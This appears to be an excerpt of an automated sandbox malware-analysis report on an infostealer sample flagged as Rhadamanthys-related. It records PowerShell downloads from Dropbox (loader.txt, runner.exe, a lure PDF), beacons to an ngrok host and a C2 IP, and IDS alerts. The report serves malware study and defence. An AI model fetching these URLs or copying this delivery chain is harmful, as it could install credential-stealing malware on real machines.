                      Source: Binary string: ntdll.pdbUGP source: 854113748.exe, 0000001D.00000003.2339382233.0000000002FC0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339181691.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: 854113748.exe, 0000001D.00000003.2339895618.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339702134.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344912074.0000000005830000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344721421.0000000005690000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2283522545.0000023B6EF5E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: b.pdb source: powershell.exe, 00000010.00000002.2283522545.0000023B6EF5E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: 854113748.exe, 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340562486.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: 854113748.exe, 0000001D.00000003.2340149595.0000000000F20000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340267249.0000000002E50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345418878.0000000005710000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345179644.00000000039C0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbSv"P source: powershell.exe, 00000010.00000002.2283522545.0000023B6EF5E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb source: 854113748.exe, 0000001A.00000000.2141718264.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371490999.0000000002420000.00000004.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,26_2_00411150
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,26_2_004631F0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,26_2_0045A7D0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00462F00 FindFirstFileW,FindClose,26_2_00462F00
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,29_2_00411150
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,29_2_004631F0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,29_2_0045A7D0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00462F00 FindFirstFileW,FindClose,29_2_00462F00
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp34_2_000001795E5A0511

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 162.213.210.250:6499 -> 192.168.2.4:49834
                      Source: global trafficTCP traffic: 192.168.2.4:49834 -> 162.213.210.250:6499
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeHTTP traffic: Redirect from: www.dropbox.com to https://uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com/cd/0/get/cgdboqi0xx9lrfnkbibhrk2o5a90nugp4szyd76wgsl8uv2e3xrvnp-wd27q_acudd072v7-jemmeubodu5z4njggyrmzhnxcbk66wtc9b1ke5hfwiu4dumwuuuqrum5yggy8zvi3r3pao9wkt-hizjn/file?dl=1#
                      Source: Joe Sandbox ViewIP Address: 162.125.65.15 162.125.65.15
                      Source: Joe Sandbox ViewIP Address: 162.125.69.18 162.125.69.18
                      Source: Joe Sandbox ViewIP Address: 162.125.69.15 162.125.69.15
                      Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 162.125.69.18:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49790 -> 162.125.69.18:443
                      Source: global trafficHTTP traffic detected: GET /api/secure/3280fc306b2b1b17d755c31452bd62f7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/nslqaaaucex7u0dud265w/secure.txt?rlkey=3djwq7bnao7gleqen7lk4ym97&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBYRhUVTjDsxE79MTNoCNhU07mzsblpWfuZAJ1kVr8F5NLHVp5HdRP3LQxOuASaVpkKRl1J1qypCBfX8gbAMtbFBAbF7EmFE1r-hX1wxJZ97dDKiUG-5gUD_1lmXFajsI84SRn-GgCVXa-VdShugwxm/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/alvflaagbv3imslrlvn5w/loader.txt?rlkey=yc2jjmh5k3fj1en6bx0570rlg&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgDOgJacclF0FHdG2mc8i44XEOVY2ykIWtYLGNsTT4GwJiMqVt-LQiQkC8J30YyTFZIyU46zoPfriT5Cou1PPRNnXmF1J6aYfMbdSYzAs0pdxsV-K3GvMKlGKRnKD6p-rdYVNvrnTb2JA6RtOIHYrfIc/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc99c9846721962dead0990bdd22.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgDBoQi0xx9LrfNKbiBhRK2o5A90NugP4SzyD76WgsL8Uv2E3XrvNp-WD27q_ACUDD072v7-jemMeUbODu5Z4NJgGyrMZHNxCbk66wtc9B1kE5Hfwiu4dumWUuuQRuM5yGGy8zvi3r3PaO9WkT-HIZJn/file?dl=1 HTTP/1.1Host: uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgChJqCRdRbWUm7TtbTWVMfwmP4neAvAliJqAmrMytKpYlGQhQrjBjH9XH16NyCWpFjZM7Rcd9WdomKiwbzIi1CuPK0ht4rYR0G3eeb_NMEnMOnNOMxCITGfzLmCkSPgF2rcW3VLbuZ1P1JsssXGh-tK/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgDPeFSvLowGEXW92RFcU_wB9Trw3pFZ50koqTNyngcPBjlOUx6Mk-UmtJOPLSUbbFVUAvs399DdhSh4Vx13Ii9hXtV2PEIyScdLwUWZ78ELshdejUuD6dK4Y1NRzWpo2vF80QzCgctIQTMQC6uKosbo/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /metadata/3280fc306b2b1b17d755c31452bd62f7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.209.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.209.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.209.100
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.209.100
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 204.79.197.237
                      Source: unknownUDP traffic detected without corresponding DNS query: 204.79.197.237
                      Source: unknownUDP traffic detected without corresponding DNS query: 204.79.197.237
                      Source: unknownUDP traffic detected without corresponding DNS query: 204.79.197.237
                      Source: global trafficHTTP traffic detected: GET /api/secure/3280fc306b2b1b17d755c31452bd62f7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/nslqaaaucex7u0dud265w/secure.txt?rlkey=3djwq7bnao7gleqen7lk4ym97&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBYRhUVTjDsxE79MTNoCNhU07mzsblpWfuZAJ1kVr8F5NLHVp5HdRP3LQxOuASaVpkKRl1J1qypCBfX8gbAMtbFBAbF7EmFE1r-hX1wxJZ97dDKiUG-5gUD_1lmXFajsI84SRn-GgCVXa-VdShugwxm/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/alvflaagbv3imslrlvn5w/loader.txt?rlkey=yc2jjmh5k3fj1en6bx0570rlg&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgDOgJacclF0FHdG2mc8i44XEOVY2ykIWtYLGNsTT4GwJiMqVt-LQiQkC8J30YyTFZIyU46zoPfriT5Cou1PPRNnXmF1J6aYfMbdSYzAs0pdxsV-K3GvMKlGKRnKD6p-rdYVNvrnTb2JA6RtOIHYrfIc/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc99c9846721962dead0990bdd22.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgDBoQi0xx9LrfNKbiBhRK2o5A90NugP4SzyD76WgsL8Uv2E3XrvNp-WD27q_ACUDD072v7-jemMeUbODu5Z4NJgGyrMZHNxCbk66wtc9B1kE5Hfwiu4dumWUuuQRuM5yGGy8zvi3r3PaO9WkT-HIZJn/file?dl=1 HTTP/1.1Host: uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgChJqCRdRbWUm7TtbTWVMfwmP4neAvAliJqAmrMytKpYlGQhQrjBjH9XH16NyCWpFjZM7Rcd9WdomKiwbzIi1CuPK0ht4rYR0G3eeb_NMEnMOnNOMxCITGfzLmCkSPgF2rcW3VLbuZ1P1JsssXGh-tK/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgDPeFSvLowGEXW92RFcU_wB9Trw3pFZ50koqTNyngcPBjlOUx6Mk-UmtJOPLSUbbFVUAvs399DdhSh4Vx13Ii9hXtV2PEIyScdLwUWZ78ELshdejUuD6dK4Y1NRzWpo2vF80QzCgctIQTMQC6uKosbo/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /metadata/3280fc306b2b1b17d755c31452bd62f7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appConnection: Keep-Alive
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: PPolicy: img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; media-src https://* blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; frame-ancestors 'self' https://*.dropbox.com ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; media-src https://* blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; report-uri 